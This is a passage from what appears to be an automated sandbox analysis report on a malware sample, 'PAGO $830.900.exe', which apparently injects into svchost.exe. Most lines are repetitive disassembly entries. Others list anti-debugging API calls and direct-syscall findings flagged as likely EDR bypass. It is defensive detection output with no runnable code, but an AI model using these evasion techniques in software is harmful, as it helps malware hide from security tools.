            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6500 mov eax, dword ptr fs:[00000030h]2_2_03BC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B644B0 mov ecx, dword ptr fs:[00000030h]2_2_03B644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03BBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B364AB mov eax, dword ptr fs:[00000030h]2_2_03B364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA49A mov eax, dword ptr fs:[00000030h]2_2_03BEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B304E5 mov ecx, dword ptr fs:[00000030h]2_2_03B304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A430 mov eax, dword ptr fs:[00000030h]2_2_03B6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C427 mov eax, dword ptr fs:[00000030h]2_2_03B2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC460 mov ecx, dword ptr fs:[00000030h]2_2_03BBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA456 mov eax, dword ptr fs:[00000030h]2_2_03BEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2645D mov eax, dword ptr fs:[00000030h]2_2_03B2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5245A mov eax, dword ptr fs:[00000030h]2_2_03B5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EBFC mov eax, dword ptr fs:[00000030h]2_2_03B5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03BBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03BDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04B00 mov eax, dword ptr fs:[00000030h]2_2_03C04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CB7E mov eax, dword ptr fs:[00000030h]2_2_03B2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28B50 mov eax, dword ptr fs:[00000030h]2_2_03B28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEB50 mov eax, dword ptr fs:[00000030h]2_2_03BDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]2_2_03BE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]2_2_03BE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB40 mov eax, dword ptr fs:[00000030h]2_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8B42 mov eax, dword ptr fs:[00000030h]2_2_03BD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86AA4 mov eax, dword ptr fs:[00000030h]2_2_03B86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68A90 mov edx, dword ptr fs:[00000030h]2_2_03B68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04A80 mov eax, dword ptr fs:[00000030h]2_2_03C04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30AD0 mov eax, dword ptr fs:[00000030h]2_2_03B30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h]2_2_03B6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h]2_2_03B6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h]2_2_03B5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h]2_2_03BBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEA60 mov eax, dword ptr fs:[00000030h]2_2_03BDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03BBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h]2_2_03B649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03BFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h]2_2_03BC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04940 mov eax, dword ptr fs:[00000030h]2_2_03C04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h]2_2_03BB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h]2_2_03BC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h]2_2_03BBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h]2_2_03BBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h]2_2_03BB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C008C0 mov eax, dword ptr fs:[00000030h]2_2_03C008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h]2_2_03BBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h]2_2_03B30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03BFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03B5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DD0AA6 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00DD0AA6
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DA25B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DA25B2
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D907BF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D907BF
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D90955 SetUnhandledExceptionFilter,0_2_00D90955
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D90BA1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D90BA1

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
